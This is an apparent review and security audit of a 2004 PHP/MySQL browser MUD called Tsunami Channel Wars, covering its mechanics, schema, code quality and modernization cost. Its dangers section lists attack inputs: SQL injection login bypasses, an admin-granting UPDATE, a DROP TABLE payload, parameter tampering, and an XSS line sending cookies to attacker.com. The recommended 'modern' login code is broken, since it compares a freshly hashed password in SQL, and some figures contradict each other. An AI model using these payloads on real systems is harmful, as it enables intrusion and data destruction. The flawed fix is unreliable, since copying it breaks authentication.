Backyard Boxin TCW

Name: Tsunami Channel Wars (TCW)

Version: 2.0.2

Total Files: 89

Total Size: 0.16 MB

Created Date: March 21, 2004 (version 2.0.1 SQL)

Last Updated: March 23, 2004 (version 2.0.2)

Author: Drakahn

Project Leader: Drakahn

Copyright: Not specified

License: Open source (no specific license mentioned)

Project URL: http://drakahn.kawanda.net:1155/ (defunct)

PHP Version: PHP 4.3.5RC3

Database: MySQL 3.23.55 with MyISAM engine

Server: Apache-based web server

Team Credits

Developer Team:

• Project Leader/Programmer: Drakahn
• Writer: Xuanwu
• Classes/Jobs: Gin
• Races: PIG:GY
• Items: Makoto-chan
• NPCs: PIG:GY

Note: ReadMe states "there are other people in the team that have not contributed yet"

File Composition

File Distribution Analysis:

• Code (48%): 43 PHP files for all functionality
• Graphics (48%): 43 image files (GIF, PNG, JPG)
• Documentation (2%): ReadMe with installation instructions
• Database (2%): Single SQL schema file

Naming Convention Note: All game files use .001.php extension suggesting a "world" or "realm" system where different versions (.002.php, .003.php) can exist for alternate game worlds.

Platform: Web-based LAMP stack MUD/RPG

Frontend: Simple HTML with minimal styling

Backend: Pure PHP procedural code

Communication: Page-based navigation (?p=pagename)

Session Management: Cookie-based authentication (email/pass)

Real-time Updates: None (page refresh required)

Game Engine: Turn-based with automated timers

World System: Multi-world support (.001, .002, .003 file variants)

Key Technical Features:

• Modular page system (include-based)
• World/realm variant support
• Turn-based PvP combat
• Timer-based regeneration (reset, revive, special)
• Status effects system
• NPC battle system
• Mail and chat systems
• Forum with replies
• Event system per world
• IP tracking
• Fulltext search indexing
• Profile system

Tsunami Channel Wars (TCW) is a text-based browser MUD RPG - described by the author as a "php/mysql 'point and click' text based browser mud rpg" or "pmpactbbmr" (tongue-in-cheek abbreviation). Players create characters, choose races and classes, engage in turn-based PvP combat, level up through experience, and participate in a persistent online world.

The game is a hobby project created by Drakahn and team, offered as open-source for others to play or run their own instances. The "BackyardBoxin - tcw v2-0-2" directory name suggests this was bundled with or sold alongside Backyard Boxin, though they are completely separate games.

Genre: Browser-based MUD/RPG / Text-based Adventure / PvP Combat Game

Theme: Fantasy/Sci-Fi hybrid (references to clones, realms, mana)

Game Style: Turn-based stat-building with persistent world

Target Audience: MUD enthusiasts, retro RPG players

Gameplay Pace: Slow-paced (turn-based, stat grinding)

Setting: Multiple parallel "worlds" or realms

Character Creation & Progression

Starting Stats:

• Level: 1 (auto-corrected to 5 if <1 - failsafe code)
• Credits: 1,000 (in-game currency)
• Energy: 5 / Max 5
• HP: 15 / Max 15
• Mana: 0 / Max 0
• Offense: 0
• Defense: 0
• Agility: 3
• Smart (Intelligence): 0
• Luck: 0
• AP (Ability Points): 20

Race System:

• Stored in race.inc file
• Currently only "Clone" race implemented
• Designed for expansion (team member assigned: PIG:GY)
• Race affects character attributes (unfinished)

Class System:

• Default: "cheat" (placeholder)
• Designed for expansion (team member assigned: Gin)
• Class affects abilities and progression (unfinished)

Level System:

// Experience to next level calculation:
$expn = (($level * 50) + ($level * 15)) * $level

Example:
Level 1: ((1*50) + (1*15)) * 1 = 65 exp
Level 5: ((5*50) + (5*15)) * 5 = 1,625 exp
Level 10: ((10*50) + (10*15)) * 10 = 6,500 exp

Level Up Rewards:

• Random AP: 1-10 points
• Random Credits: level * (1-50 random)
• Example: Level 5 up = 5 * rand(1,50) = 5-250 credits
• Experience overflow rolls to next level
• Log entry notification

AP (Ability Points) System:

• Earned on level up (1-10 random)
• Spent to increase stats
• Accessible via ?p=ap page
• Permanent stat increases

Combat System

Turn-Based PvP:

The game uses an asynchronous turn-based combat system tracked in the battle table:

• Starter: Player who initiated attack
• Target: Defender
• Lastmove: Who moved last (determines whose turn)

Combat Flow:

• Player initiates attack on target
• Battle record created (starter, target, lastmove=target)
• Starter makes first move
• System sets lastmove=starter
• Target responds when they log in
• Back-and-forth continues until one dies

Attack Options:

• Strike a Blow (Safe Attack):
• Never misses
• Damage = Offense - Enemy Defense
• Minimum 0 damage
• Reliable but low damage

• Critical Blow (Risky Attack):
• 20% hit chance (1 in 5)
• Success: (Offense - Defense + 1) * 3 damage
• Failure: Enemy counters for (Enemy_Offense - Defense + 1) * 2 damage
• High risk, high reward

Damage Formula:

// Normal strike:
damage = attacker_offense - defender_defense
if (damage < 0) damage = 0;

// Critical hit:
damage = (attacker_offense - defender_defense + 1) * 3

// Counter on miss:
counter = (defender_offense - attacker_defense + 1) * 2

Death & Consequences:

• HP reaches 0: Character dies
• Cannot attack or be attacked while dead
• Revive timer controls resurrection
• Last killed / Last killed by tracked
• Win/loss record maintained

Combat Restrictions:

• Cannot attack yourself (error check)
• Cannot attack dead players
• Cannot attack while dead
• Must wait for opponent's turn

NPC Combat System

NPC Battle Table:

Separate system for fighting computer-controlled enemies:

• Name, HP, Max HP
• Energy, Max Energy
• Agility, Level
• Offense, Defense

Starting NPC:

• Sheep - Level 1 practice enemy
• HP: 50 / 50
• Energy: 15 / 15
• Agility: 10
• Offense: 10
• Defense: 10

System designed for expansion with more NPCs (team member: PIG:GY)

World/Realm System

Multi-World Architecture:

Files use naming convention: filename.worldid.php

• Example: stimits.001.php, fight.001.php, overview.001.php
• World stored in player record: world varchar(20)
• Default world: "001"

System Logic:

`php

if (file_exists("$p.$stat[world].php")) {

include("$p.$stat[world].php"); // World-specific version

} else {

include("$p.001.php"); // Default version

}

`

Purpose:

• Multiple parallel game instances
• Different rules per world
• Alternate content/storylines
• Server load distribution
• Allows customization per realm

Special World Features:

• Different stimits (stat limits?)
• Different events (event.001.php vs event.002.php)
• Different warp systems (warp.001, .002, .003 exist)
• Different clocktower mechanics

Economy System

Currency:

• Credits - Primary currency (double/decimal)
• Platinum - Secondary/premium currency (double/decimal)
• Credits earned through:
• Level ups (level * rand(1,50))
• Combat victories (likely)
• Quests/events (unconfirmed)
• Referrals (refs field tracked)

Casino Games:

• Slots (slots.001.php)
• Craps (craps.001.php)
• Likely bet credits for gambling

Energy System

Energy Mechanics:

• Current energy vs Max energy
• Required for actions (unspecified which)
• Regenerates over time via timers
• Upgradeable maximum

Mana System:

• Current mana vs Max mana
• Likely for skills/spells (useskills.001.php)
• Initially 0/0 (unlocked through progression?)
• Upgradeable maximum

Status Effects System

Effects Table:

• Effect name/description
• Player ID
• Time left (duration)
• Displayed on overview page
• Examples unclear (buffs/debuffs)

Social Systems

Chat System (chat.001.php, chatmsgs.php):

• User/message storage
• Target field (whispers?)
• puser/pchat (private chat?)
• Time fields (hour/minute display)
• Fulltext search indexed

Mail System (mail.001.php):

• Sender/recipient tracking
• Subject/body text
• Unread flag
• Sender ID for reply functionality

Forum System (forums.001.php):

• Topics table (thread subjects)
• Replies table (posts)
• Starter tracking
• LPB (Last Post By?) field
• Topic/body text

Log System (log.001.php):

• Event notifications
• Unread flag
• Owner (player) tracking
• 10,580 entries in dump (active game!)

Directory & View Systems

Directory (directory.001.php):

• Player listing/search
• Community browsing

View Player (view.001.php):

• Public profile viewing
• Stats display
• Profile text (fulltext indexed)

Account Management (account.001.php):

• Profile editing
• Settings management
• Email/password changes

Clan System

Basic Structure:

• Clan ID stored in players table
• Clan table structure not in provided SQL
• "View My Clan" link in overview
• Unfinished feature (incomplete)

Timer System

Time Table (3 columns):

• Reset - Full server reset timer
• Revive - Dead player resurrection timer
• Special - Special events timer

All initialized to 1 (likely placeholder)

Purpose:

• Automated game cycles
• Energy/HP regeneration
• Player revival from death
• Special event triggers
• Turn-based timing

Items & Skills Systems

Items (items.001.php):

• Equipment system designed
• Not implemented in provided SQL
• Team member assigned: Makoto-chan

Skills (useskills.001.php):

• Skill usage system
• Likely consumes mana
• Not fully implemented

Upgrade System (upgrade.001.php)

Premium account upgrades:

• Account enhancements
• Likely premium features
• Payment integration unclear

Warp System (warp.001/002/003.php)

Three Warp Files:

• Fast travel system
• World/location movement
• Multiple implementations suggest different realms

Administrative Features

Admin Panel (admin.001.php):

• Rank: "Admin" vs "Member"
• Full player editing capability
• Manual SQL editing mentioned in ReadMe

Admin Cast (admincast.php):

• Broadcast announcements
• Server messages
• Event notifications

Updates System (updates.001.php):

• Changelog display
• News posts
• Starter/title/when fields
• 40 updates created (active development)

Clock Tower System (clocktower.001.php)

Unknown mechanic - possibly:

• Time-based events
• Timed quests
• Server clock display
• Scheduling system

CBD System (CBD.001.php, CBD.002.php)

Unknown mechanic (acronym unclear):

• Two implementations
• Possibly "Combat Battle Damage"?
• Or game-specific feature

9 Tables (MyISAM):

• players - User accounts (139 players created)
• id, user (varchar 30), email, pass (varchar 32)
• rank (varchar 10) - "Member" or "Admin"
• level, exp, expn (exp needed)
• credits, platinum
• hp, max_hp, energy, max_energy, mana, max_mana
• offense, defense, agility, smart, luck
• ap (ability points)
• wins, losses, lastkilled, lastkilledby
• lpv (last page view), page, ip
• clan, profile
• refs (referrals)
• race (varchar 32), class (varchar 32)
• tshow (int 20) - unknown
• world (varchar 20) - default "001"
• special (int 20) - unknown flag

• battle - Active PvP combat (882 battles)
• id, starter, target, lastmove
• Tracks turn-based combat state

• npcbattle - NPC enemies (1 NPC: Sheep)
• Complete stat block for computer enemies
• Separate from player stats

• chat - Chat messages (203 messages)
• user, chat, target, puser, pchat
• timeh, timem (hour/minute)
• Fulltext indexed

• mail - Private messages (41 messages)
• sender, senderid, owner, subject, body
• unread flag

• log - Event notifications (10,579 events!)
• owner, log, unread
• Massive activity shows real players

• topics - Forum threads (38 topics)
• topic, body, starter, lpb (last post by?)

• replies - Forum posts (126 replies)
• starter, topic_id, body
• Active forum community

• time - Server timers (1 row)
• reset, revive, special
• Global game state

• updates - Changelog (39 updates)
• starter, title, updates, when
• Development activity log

Database Activity Evidence:

• 139 players - Substantial user base
• 882 battles - High combat engagement
• 10,579 log entries - Massive activity
• 203 chat messages - Active social interaction
• 126 forum replies - Engaged community
• 41 mail messages - Private communication

This was a genuinely played game with real community.

Implemented Features:

Turn-based PvP combat

Level system with experience

Multi-stat character system (8 stats)

NPC combat framework

Multi-world/realm system

Chat system

Mail system

Forum with replies

Event log

Profile system

Casino games (slots, craps)

Timer-based regeneration

Death and revival system

IP tracking

Referral tracking

Admin panel

Update/news system

Two-currency economy

Status effects system

Directory/player search

Account management

Win/loss tracking

Feature Completeness: 70%

Core gameplay works, but major systems unfinished.

Missing/Incomplete Features:

Race system (only "Clone" exists)

Class system (only "cheat" placeholder)

Items/equipment system (mentioned, not implemented)

Skills system (file exists, incomplete)

Clan system (referenced, incomplete)

Multiple NPCs (only Sheep exists)

CBD system (unclear purpose)

Clock Tower mechanic (unclear)

Upgrade system details

Warp system documentation

Strong Design Elements:

• Multi-World Architecture - Innovative for 2004:
• File-based world variants (.001, .002, .003)
• Each world can have different rules
• Allows parallel game instances
• Load distribution
• Content variety

• Asynchronous Turn-Based Combat - Clever system:
• No need for both players online
• lastmove field determines whose turn
• Persistent battle state
• "Your Turn" vs "Not Your Turn" UI
• Works well for web-based game

• Status Effects Framework - Forward-thinking:
• Time-based duration tracking
• Extensible system
• Visual display on overview
• Ready for buffs/debuffs

• Modular Page System - Clean architecture:
• ?p=pagename navigation
• Include-based loading
• Easy to add new pages
• World-specific overrides

• Two-Currency Economy - Depth:
• Credits (common) and Platinum (premium)
• Separation prevents inflation
• Monetization potential

• NPC System Separation - Good design:
• Separate npcbattle table
• Can have different rules for NPCs
• Prevents player-NPC stat confusion

Well-Architected Features:

• Clean file organization
• Consistent naming convention
• World variant system
• Timer-based automation
• Fulltext search optimization
• Error display enabled (development-friendly)

Strengths:

• Modular page structure
• Consistent file naming (.001.php convention)
• World variant system (forward-thinking)
• Readable variable names
• Development team organization
• Documentation (ReadMe exists)

Weaknesses:

• Pure procedural code (no OOP)
• Direct MySQL queries (no prepared statements)
• SQL injection everywhere
• Global variables ($stat, $email, $pass)
• register_globals dependency ($p, $battle, $start, $hit)
• No input sanitization
• No password hashing (varchar 32 suggests MD5 at best)
• No CSRF protection
• XSS vulnerabilities in all output
• Logic in presentation (no MVC)
• No error handling
• Ancient mysql_* functions
• Hardcoded session management
• No abstraction layers

Code Audit Examples:

// From index.php - Multiple vulnerabilities:
$stat = mysql_fetch_array(mysql_query(
  "select * from players where email='$email' and pass='$pass'"
));

// Issues:
// 1. SQL injection ($email, $pass directly concatenated)
// 2. No prepared statements
// 3. Password appears plain text or MD5 (varchar 32)
// 4. Global variables

// From fight.001.php - register_globals:
if($hit==1){
  $damage=$stat[offense]-$fight[defense];
  mysql_query("update players set hp=hp-$damage where id=$fight[id]");
}

// Issues:
// 1. $hit comes from GET/POST/COOKIE (register_globals)
// 2. SQL injection ($damage, $fight[id])
// 3. No validation
// 4. No error checking

Overall Code Quality Rating: 3/10

For a 2004 hobby project, this is typical amateur code. It works (139 players, 10K log entries prove it), but has zero security. The multi-world system shows creative thinking, but implementation is dangerous.

Current Viability

What This Codebase Is Good For Today:

• Game Design Study - Multi-world system interesting
• MUD Architecture Reference - Turn-based combat pattern
• Hobby Project Example - Shows what individuals could build
• Community Engagement Study - 139 players, 10K logs proves viability
• Asynchronous Combat Design - Clever solution for web games
• Historical Artifact - 2004-era hobby MUD/RPG

NOT Recommended For:

• Production deployment (massive security holes)
• Learning PHP (teaches dangerous practices)
• Real user data (passwords compromised)
• Any network-accessible server

Requirements to Fire It Up

Minimal Setup (DANGEROUS):

Server Requirements:

• PHP 4.3.5 to 5.6 (PHP 7+ breaks mysql_*)
• MySQL 3.23.55+
• Apache web server
• register_globals = On (huge security hole)

Installation Steps (from ReadMe):

• Unzip to directory
• Edit mysql.php with database credentials
• Upload to webspace
• Import TCW2.0.1.sql
• Create account
• Manually edit MySQL row: set rank='Admin'
• Play

Critical Issues:

• No admin creation tool (manual SQL editing)
• No password hashing visible
• register_globals required
• Ancient PHP/MySQL versions
• No HTTPS enforcement

Modernization Requirements (PHP 8.4 + Modern Stack)

Estimated Effort: 400-600 hours (10-15 weeks full-time)

1. PHP Modernization (150-220 hours)

Critical Changes:

• ❗ Replace ALL mysql_* with PDO (43 PHP files)
• ❗ Implement prepared statements everywhere
• ❗ Add password hashing (bcrypt/Argon2)
• ❗ Remove register_globals dependencies
• ❗ Update to PHP 8.4 syntax
• Convert to OOP with MVC framework
• Add namespaces and autoloading
• Implement dependency injection
• Add type hints and return types
• Add exception handling
• Separate logic from presentation

Example Modernization:

`php

// OLD (2004):

$stat = mysql_fetch_array(mysql_query(

"select * from players where email='$email' and pass='$pass'"

));

// MODERN (2024):

$stmt = $pdo->prepare(

"SELECT * FROM players WHERE email = ? AND pass = ?"

);

$stmt->execute([$email, password_hash($pass, PASSWORD_ARGON2ID)]);

$user = $stmt->fetch(PDO::FETCH_ASSOC);

if ($user && password_verify($inputPass, $user['pass'])) {

$_SESSION['user_id'] = $user['id'];

}

`

2. Security Overhaul (120-180 hours)

Critical Vulnerabilities:

• SQL Injection - Every single query vulnerable
• Authentication Bypass - Plain text/MD5 passwords
• XSS - All outputs unescaped
• CSRF - No tokens anywhere
• Session Management - Cookie-based, no HttpOnly/Secure
• register_globals - Remote code execution risk
• No Input Validation - Accept any data
• IP Tracking Ineffective - Easily spoofed

Required Security Implementations:

• Input validation library (whitelist approach)
• Output escaping (htmlspecialchars everywhere)
• CSRF tokens on all forms
• Password hashing with cost factor
• Secure session management
• HTTPS enforcement
• Security headers (CSP, X-Frame-Options)
• Rate limiting
• SQL injection prevention via prepared statements
• Authentication system rebuild

3. Database Modernization (40-60 hours)

• Convert MyISAM to InnoDB
• Add foreign key constraints:
• players.clan → clans.id
• mail.senderid → players.id
• battle.starter/target → players.id
• log.owner → players.id
• Add proper indexes
• Normalize data (effects table missing?)
• Implement migrations system
• Add timestamps (created_at, updated_at)
• Change password to char(60) for bcrypt
• Consider Redis for:
• Session storage
• Combat state caching
• Timer management

4. Frontend Modernization (80-120 hours)

• Rebuild UI with modern HTML5/CSS3
• Implement responsive design
• Add JavaScript framework (Vue.js/React)
• Implement AJAX for:
• Combat updates
• Chat messages
• Notifications
• Real-time stat updates
• Add WebSocket support for:
• Live chat
• Battle notifications
• Player online status
• Improve UX/UI design
• Add loading states
• Add error handling
• Client-side validation

5. Combat System Enhancement (30-50 hours)

• Real-time combat notifications
• Combat log with details
• Spectator mode
• Battle history visualization
• Damage calculation display
• Critical hit animations
• Health bar display
• Turn timer countdown
• Auto-battle option
• Combat statistics

6. Feature Completion (80-120 hours)

Complete Unfinished Systems:

• Race System:
• 5-10 races with unique bonuses
• Race selection UI
• Stat modifiers
• Racial abilities

• Class System:
• 5-10 classes with different playstyles
• Class skills and abilities
• Progression trees
• Specialization paths

• Items/Equipment:
• Weapons, armor, accessories
• Item stats and bonuses
• Inventory management
• Equip/unequip system
• Item drops from combat

• Skills System:
• Active and passive skills
• Skill trees
• Mana consumption
• Cooldowns
• Skill leveling

• Clan System:
• Create/join/leave clans
• Clan chat
• Clan wars
• Clan benefits
• Clan rankings

• More NPCs:
• 20+ enemy types
• Boss encounters
• Difficulty progression
• Loot tables

7. Testing & Quality Assurance (40-60 hours)

• Unit tests for combat calculations
• Integration tests for user flows
• Security penetration testing
• Load testing (concurrent users)
• Browser compatibility testing
• Mobile responsiveness testing
• Create CI/CD pipeline

Total Estimated Modernization Cost: $20,000 - $60,000 at industry rates

Verdict: The multi-world architecture is innovative, and the asynchronous turn-based combat is clever for web games. However, the codebase is 70% incomplete and the implementation is catastrophically insecure.

Building from scratch would be 30-40% faster:

• Modern MUD: 250-350 hours with Laravel + Vue.js + WebSockets
• vs 400-600 hours modernizing + completing unfinished features

The only reusable elements are:

• Game design concepts (especially multi-world system)
• Combat formulas
• Database schema ideas (after normalization)
• World variant pattern

Code Quality Assessment Summary

What Works Well:

• Multi-world architecture (innovative)
• Asynchronous turn-based combat (clever)
• Modular page system
• Evidence of real community (10K logs)
• Two-currency economy
• Timer-based automation

What Doesn't Work:

• Zero security anywhere
• 70% feature incomplete
• No password hashing
• SQL injection everywhere
• register_globals dependencies
• XSS in all outputs
• No error handling
• Ancient PHP functions

Grade: D+ (Functional core, dangerous implementation, incomplete)

The game worked for 139 real players (10,579 log entries don't lie), proving the design is solid. However, security is non-existent and major systems are unfinished. As a hobby project it's impressive; as production code it's catastrophic.

Inherent Dangers of Running This Code

CRITICAL SECURITY RISKS (Severity: 10/10):

1. SQL Injection Everywhere:

`php

// From fight.001.php:

$fight = mysql_fetch_array(mysql_query(

"select * from players where id='$battle'"

));

// Attacker: ?battle=1' OR '1'='1

// Result: Bypasses all checks, gains admin access

`

2. Authentication Bypass:

`php

// From index.php:

$stat = mysql_fetch_array(mysql_query(

"select * from players where email='$email' and pass='$pass'"

));

// Attack: email=This email address is being protected from spambots. You need JavaScript enabled to view it.&pass=' OR '1'='1

// Result: Login as anyone without password

`

3. Password Storage:

• varchar(32) suggests MD5 or plain text
• No salting visible
• Rainbow table attacks trivial
• All passwords compromised in breach

4. register_globals Exploitation:

`php

// From fight.001.php:

if($start==yes){

mysql_query("INSERT INTO battle...");

}

// Attack: ?start=yes&stat[id]=1&battle=999

// Result: Manipulate any variable, bypass checks

`

5. XSS Everywhere:

`php

// From overview.001.php:

print "Record: $stat[wins]/$stat[losses]/$rt
";

print "Last Killed: $stat[lastkilled]
";

// Attack: Set username to: steal_session()

// Result: XSS on every page showing the user

`

6. Combat Manipulation:

`php

// From fight.001.php:

if($hit==1){

$damage=$stat[offense]-$fight[defense];

mysql_query("update players set hp=hp-$damage where id=$fight[id]");

}

// Attack: ?hit=1&stat[offense]=9999999

// Result: One-shot kill anyone

`

7. Level Manipulation:

`php

// From index.php:

if($stat[level]<1){

mysql_query("update players set level=5 where id=$stat[id]");

}

// Attack: ?stat[level]=0

// Result: Instant level 5, triggers repeatedly

`

8. No Admin Protection:

• Rank stored as varchar "Admin" or "Member"
• No session validation
• Anyone can set rank='Admin' via SQL injection

Real-World Attack Scenarios:

Scenario 1: Instant Admin (10 seconds)

`sql

-- In email field:

admin' OR rank='Admin'; UPDATE players SET rank='Admin' WHERE id=1; --

`

Result: Grant yourself admin, full database access

Scenario 2: God Mode (5 seconds)

`

http://site.com/index.php?stat[offense]=999999&stat[defense]=999999

&stat[hp]=999999&stat[level]=999

`

Result: Invincible character, one-shot everyone

Scenario 3: Database Wipe (2 minutes)

`sql

-- In any input field:

'; DROP TABLE players; DROP TABLE battle; --

`

Result: Entire game database destroyed

Scenario 4: Session Hijacking (1 minute)

// In profile:



document.location='http://attacker.com/steal?cookie='+document.cookie;

Result: Steal all player sessions viewing profile

Impact Assessment:

• Confidentiality: Total breach (all passwords visible/crackable)
• Integrity: Total compromise (any data modifiable)
• Availability: Easy destruction (DROP TABLE attacks)
• Community: Trust destroyed if breached
• Legal: Likely violates data protection laws

Innovation & Uniqueness Rating

Innovation Score: 6/10 (for 2004)

Innovative Elements:

• Status Effects Framework - Forward-looking:
• Time-based duration system
• Extensible design
• Ready for buffs/debuffs
• More advanced than typical 2004 MUDs

• Two-Currency Economy - Depth:
• Credits (common) and Platinum (rare)
• Prevents inflation
• Monetization potential
• More sophisticated than single currency

Standard Elements:

• Turn-based combat (common)
• Level/experience system (universal)
• Chat/mail/forums (required)
• Stats and abilities (expected)
• PvP focus (typical MUD)

Uniqueness Score: 4/10

TCW is one of thousands of browser MUDs from 2003-2006. The multi-world system is its main distinguishing feature. Otherwise, it's a standard text-based RPG with unfinished race/class systems.

Historical Significance:

Represents the hobby MUD developer era (2000-2006) where individuals built and hosted their own games:

• Source code freely shared
• Small communities (139 players typical)
• Unfinished features common
• Team collaboration (writers, designers)
• Hosted on personal servers (kawanda.net:1155)

The market died with:

• Flash games (richer graphics)
• Social games (FarmVille era)
• Mobile games (2008+)
• MMORPGs (WoW dominance)

TCW represents pure hobby game development - built for fun, not profit.

Comparison to Contemporary Games

vs. Kingdom of Loathing (2003):

• KoL had humor and polish
• TCW more traditional MUD
• KoL survived to today
• TCW died circa 2006

vs. Urban Dead (2005):

• Urban Dead had unique setting (zombies)
• TCW generic fantasy/sci-fi
• Urban Dead had better community features
• Both used simple text-based interface

vs. Other Browser MUDs (hundreds existed):

• TCW's multi-world system unique
• Otherwise very similar to competition
• Most died 2006-2008
• Few survivors (KoL, Torn City)

Market Position: Lower-tier hobby project. Small community, unfinished features, but functional core. Typical of the era.

Final Recommendation

Bottom Line:

Tsunami Channel Wars was an ambitious hobby project with innovative ideas (especially the multi-world architecture). The asynchronous turn-based combat system is clever, and the evidence of real community (139 players, 10,579 log entries) proves the core gameplay worked.

Strengths:

• Multi-world architecture (genuinely innovative)
• Asynchronous turn-based combat (clever solution)
• Real community (139 players, 10K logs)
• Two-currency economy
• Status effects framework
• Team collaboration

Fatal Flaws:

• 70% feature incomplete (race/class/items/skills unfinished)
• Catastrophic security (SQL injection everywhere)
• No password hashing (MD5 at best)
• register_globals dependencies
• XSS throughout
• Ancient PHP/MySQL

Modern Value: Low except as:

• Multi-world architecture study
• Asynchronous combat pattern
• Hobby MUD history
• Security anti-pattern example
• Game design reference

If building a browser MUD today:

• Study the multi-world concept
• Implement asynchronous combat system
• Use Laravel + Vue.js + WebSockets
• Build in 250-350 hours vs trying to fix this
• Prioritize security from day one

Rating Summary